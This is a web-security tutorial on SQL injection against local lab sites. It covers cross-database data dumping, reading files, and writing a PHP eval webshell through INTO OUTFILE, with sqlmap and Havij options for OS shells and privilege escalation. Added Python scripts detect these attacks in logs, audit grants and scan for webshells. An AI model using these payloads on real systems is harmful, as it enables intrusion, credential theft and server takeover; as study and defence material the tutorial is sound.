Web security: SQL injection privileges, cross-database injection, file read and write, and command execution

One, cross-database injection

For example, two sites, A and B, are hosted on the same IP and share one database instance. If site A has a high-privilege (root) injection point, the data of site B, and of any other web application in the same database instance, can be leaked.
Demonstrated here:
Local site A: http://sqli-labs-master:100/Less-1/, database account privilege: root
Local site B: http://127.0.0.1/xinyuan/index.php, database account privilege: ordinary user

At this point, we first inject manually on site A to check the privilege of the database account. id=-1' union select 1,2,user() --+ shows that it is root.

Check all the databases: -1' union select 1,group_concat(SCHEMA_NAME),3 from information_schema.schemata--+

Here you can find site B's database php_wish, as well as the databases of other sites. I introduced the column schema_name of the information_schema.schemata table earlier: that table stores the names of all databases.

Next we get all the table names under site B's database: -1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='php_wish'--+ shows that there is only one table, named wish.

Then get all the column names under the wish table: -1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='wish' and table_schema='php_wish'--+

Finally get the data: -1' union select 1,id,password from php_wish.wish--+ Note that in cross-database injection you must prefix the table name with the database name and a dot, because the current database is security, and a query that does not name a database looks for the table in the security database.

That was manual injection; what is different when using the tool sqlmap? If the target site has a high-privilege injection point, an option such as --tables makes the tool first enumerate all databases reachable with that privilege and then their table names by default. How does the tool judge whether the privilege is high? Different databases have different built-in functions for this; --is-dba is enough to check whether the current account is a DBA.
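The enumeration sequence above (the user() probe, then information_schema.schemata, .tables and .columns, then the data itself) leaves a recognisable trail in the web server's access log. The following Python script is an added example, not part of the original post: it URL-decodes the request target of each line in a few constructed Apache-style log lines, flags the indicators this walkthrough relies on (UNION SELECT, information_schema lookups, user()/version probes, load_file() and INTO OUTFILE), and counts flagged requests per source address. The log lines, addresses and timestamps are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines; addresses and timestamps are made up.
# Lines 2-4 replay the payloads from this walkthrough, URL-encoded as a browser sends them.
LOG_SAMPLE = """\
10.0.0.5 - - [01/Mar/2021:10:00:01 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 512
10.0.0.7 - - [01/Mar/2021:10:00:09 +0800] "GET /Less-1/?id=-1%27%20union%20select%201,2,user()%20--+ HTTP/1.1" 200 640
10.0.0.7 - - [01/Mar/2021:10:00:15 +0800] "GET /Less-1/?id=-1%27%20union%20select%201,group_concat(SCHEMA_NAME),3%20from%20information_schema.schemata--+ HTTP/1.1" 200 901
10.0.0.7 - - [01/Mar/2021:10:01:02 +0800] "GET /Less-1/?id=1%27%20union%20select%201,load_file(%27d:/test.txt%27),3--+ HTTP/1.1" 200 777
10.0.0.9 - - [01/Mar/2021:10:02:00 +0800] "GET /xinyuan/index.php?page=union HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators drawn from the payloads shown on this page, matched case-insensitively
# against the URL-decoded request target.
SQLI_PATTERNS = {
    "union_select": re.compile(r"union\s+(?:all\s+)?select", re.I),
    "information_schema": re.compile(r"information_schema\.(?:schemata|tables|columns)", re.I),
    "privilege_probe": re.compile(r"\b(?:user|current_user|system_user|version)\s*\(\s*\)|@@version", re.I),
    "file_read": re.compile(r"load_file\s*\(", re.I),
    "file_write": re.compile(r"into\s+(?:out|dump)file", re.I),
}


def decode_target(target, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are normalised too."""
    for _ in range(rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def scan_access_log(lines):
    """Return one finding per request whose decoded target matches any indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable access-log line
        target = decode_target(m.group("target"))
        indicators = [name for name, rx in SQLI_PATTERNS.items() if rx.search(target)]
        if indicators:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "target": target, "indicators": indicators})
    return findings


def offenders(findings):
    """Count flagged requests per source address."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_access_log(LOG_SAMPLE.splitlines())
    for f in found:
        print(f["ip"], f["ts"], ",".join(f["indicators"]), f["target"])
    print(offenders(found))
```

Decoding before matching matters: the same payload reaches the log as %27%20union%20select, and a single decode pass would miss a double-encoded variant, so the decoder loops until the string stops changing. A plain "union" in a normal parameter (the last sample line) is not flagged because the indicator requires the UNION ... SELECT pair.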

Two, file read and write

With high privileges you can read and write files: fetch sensitive files, or write a one-line Trojan (webshell).

1' union select 1,load_file('d:/test.txt'),3--+

Write a one-line Trojan (webshell):
id=-1' union select 1,'<?php eval($_POST[cmd]);?>',3 into outfile 'D:/phpstudy_pro/WWW/xinyuan/x.php' --+

This requires the web application's physical path, which can be obtained from a phpinfo page, error messages, leaked source code, the middleware (web server) configuration files, brute-forcing common paths, etc.
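Both file primitives above work only because the injected account holds the FILE privilege (root has ALL PRIVILEGES on *.*, which includes it) and because MySQL's secure_file_priv setting does not confine load_file() and INTO OUTFILE to a directory. The following Python script is an added example, not from the original post: it parses constructed SHOW GRANTS output for the two accounts of this walkthrough (root and the ordinary xinyuan user) plus a hypothetical over-privileged "sqli" account, reports global scope, FILE, ALL PRIVILEGES and WITH GRANT OPTION per account, and classifies a secure_file_priv value. The grant lines and the sqli account name are constructed.

```python
import re

# Constructed SHOW GRANTS output; the "sqli" account is hypothetical and only
# illustrates a FILE grant on an account that is not root.
GRANTS_SAMPLE = {
    "root@localhost": [
        "GRANT ALL PRIVILEGES ON *.* TO `root`@`localhost` WITH GRANT OPTION",
    ],
    "xinyuan@localhost": [
        "GRANT USAGE ON *.* TO `xinyuan`@`localhost`",
        "GRANT SELECT, INSERT, UPDATE ON `php_wish`.* TO `xinyuan`@`localhost`",
    ],
    "sqli@localhost": [
        "GRANT SELECT, FILE ON *.* TO `sqli`@`localhost`",
    ],
}

GRANT_RE = re.compile(r"^GRANT (?P<privs>.+?) ON (?P<scope>\S+) TO (?P<who>\S+)(?P<tail>.*)$")


def parse_grant(line):
    """Split one GRANT statement into (privilege list, scope, has WITH GRANT OPTION)."""
    m = GRANT_RE.match(line.strip().rstrip(";"))
    if not m:
        raise ValueError(f"unrecognised GRANT statement: {line!r}")
    privs = [p.strip().upper() for p in m.group("privs").split(",")]
    return privs, m.group("scope"), "WITH GRANT OPTION" in m.group("tail").upper()


def audit_account(grant_lines):
    """Return the sorted list of least-privilege violations for one account."""
    issues = set()
    for line in grant_lines:
        privs, scope, grant_option = parse_grant(line)
        if privs == ["USAGE"]:
            continue  # USAGE grants nothing; it only records that the account exists
        if "ALL PRIVILEGES" in privs:
            issues.add("superuser")
        # FILE is what makes load_file() and INTO OUTFILE possible; ALL PRIVILEGES includes it.
        if "FILE" in privs or "ALL PRIVILEGES" in privs:
            issues.add("file_privilege")
        # Anything granted on *.* reaches every database on the instance, i.e. the other
        # sites' data, which is exactly the cross-database case described above.
        if scope == "*.*":
            issues.add("global_scope")
        if grant_option:
            issues.add("grant_option")
    return sorted(issues)


def audit_grants(grants):
    """Audit a mapping of account -> list of SHOW GRANTS lines."""
    return {account: audit_account(lines) for account, lines in grants.items()}


def audit_secure_file_priv(value):
    """Classify secure_file_priv: NULL disables file I/O, an empty string leaves it
    unrestricted, and a directory confines load_file()/INTO OUTFILE to that path."""
    if value is None or value.strip().upper() == "NULL":
        return "file_io_disabled"
    if value.strip() == "":
        return "file_io_unrestricted"
    return f"file_io_restricted_to:{value.strip()}"


if __name__ == "__main__":
    for account, issues in audit_grants(GRANTS_SAMPLE).items():
        print(account, "OK (least privilege)" if not issues else ", ".join(issues))
    print(audit_secure_file_priv(""), audit_secure_file_priv("NULL"))
```

The xinyuan account comes out clean because its only real grant is scoped to its own database; that is the shape a web application account should have, and it is what stops an injection in that application from reading other sites' tables or touching the filesystem.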

Three, injection permissions, command execution

Here we use the Mozhe range with a SQL Server database and compare two tools: 1. Pangolin, 2. Havij.
1. Compare how they operate against SQL Server and other databases.
2. The tools can be operated to identify and attack the injection point automatically.

Then the following operations are available; we pick just a few of them.

Get data

Execute a command

File management

Havij's operation interface is as follows:

[screenshot: Havij operation interface]

So different databases correspond to different operations. Now let's look at some of sqlmap's operations.

--current-user   show the current database user

--file-read   read a file from the server

--file-write   write a local file to the server; it is followed by the remote path the file is written to (--file-dest)

--sql-shell   open an interactive SQL shell

--os-shell   open an interactive OS shell.

Following up on the server, we can see that two files, tmpbvizc.php and tmpucvgu.php, have been uploaded.
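An --os-shell session leaves the stager files just noted (tmpbvizc.php and tmpucvgu.php) in the web root, and the INTO OUTFILE step from the previous section leaves x.php with an eval($_POST[...]) body; both are things a defender can sweep for after the fact. The following Python script is an added example, not part of the original post: it builds a small constructed web root in a temporary directory and scans it for both traces. The stager filename pattern (tmp, then b or u, then four letters, then .php) is an assumption generalised from the two names observed in this post, not sqlmap's documented naming scheme.

```python
import re
import tempfile
from pathlib import Path

# Filename pattern ASSUMED from the two stagers seen in this post (tmpbvizc.php, tmpucvgu.php):
# "tmp", then b or u, then four letters, then .php. Not sqlmap's documented scheme.
STAGER_NAME_RE = re.compile(r"^tmp[bu][a-z]{4}\.php$", re.I)
# Body pattern for the one-line webshell written via INTO OUTFILE above:
# a code-execution function fed straight from a request variable.
WEBSHELL_BODY_RE = re.compile(
    rb"(?:eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(?:POST|GET|REQUEST)\b", re.I
)
PHP_SUFFIXES = {".php", ".phtml", ".php5"}


def classify_file(path):
    """Return the list of reasons a file looks like an injection artefact (empty if clean)."""
    path = Path(path)
    reasons = []
    if STAGER_NAME_RE.match(path.name):
        reasons.append("sqlmap_stager_name")
    if path.suffix.lower() in PHP_SUFFIXES and WEBSHELL_BODY_RE.search(path.read_bytes()):
        reasons.append("request_to_eval")
    return reasons


def scan_webroot(root):
    """Walk a web root and map each suspicious file (POSIX-style relative path) to its reasons."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if path.is_file():
            reasons = classify_file(path)
            if reasons:
                findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_sample_webroot():
    """Constructed fixture: a throwaway web root with benign files, the dropped x.php
    and two files named like the stagers seen in this post."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    (root / "xinyuan").mkdir()
    (root / "xinyuan" / "index.php").write_text("<?php echo 'hello'; ?>")
    (root / "xinyuan" / "x.php").write_text("<?php eval($_POST[cmd]);?>")
    (root / "tmpbvizc.php").write_text("<?php /* constructed stand-in for the stager body */ ?>")
    (root / "tmpucvgu.php").write_text("<?php /* constructed stand-in for the uploader body */ ?>")
    (root / "tmpnotes.txt").write_text("tmp is a common prefix; this file is not a stager")
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    for rel, reasons in sorted(scan_webroot(sample).items()):
        print(rel, "->", ", ".join(reasons))
```

Two independent signals are used on purpose: the name check catches the stagers even when their bodies are harmless leftovers, and the body check catches a dropped shell regardless of what it was named, so a renamed x.php is still found while tmpnotes.txt is not.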

Then there are the following options, which we do not demonstrate here:

--os-cmd=ver      run a custom command
--os-cmd=OSCMD    // execute an operating system command
--os-shell        // get an OS shell back
--os-pwn          // pwn: get a shell or VNC session back under msf
--os-smbrelay     // get a shell or VNC session back under msf
--os-bof          // stored procedure buffer overflow
--priv-esc        // database privilege escalation
--reg-read --reg-add --reg-del --reg-key
--reg-value --reg-data --reg-type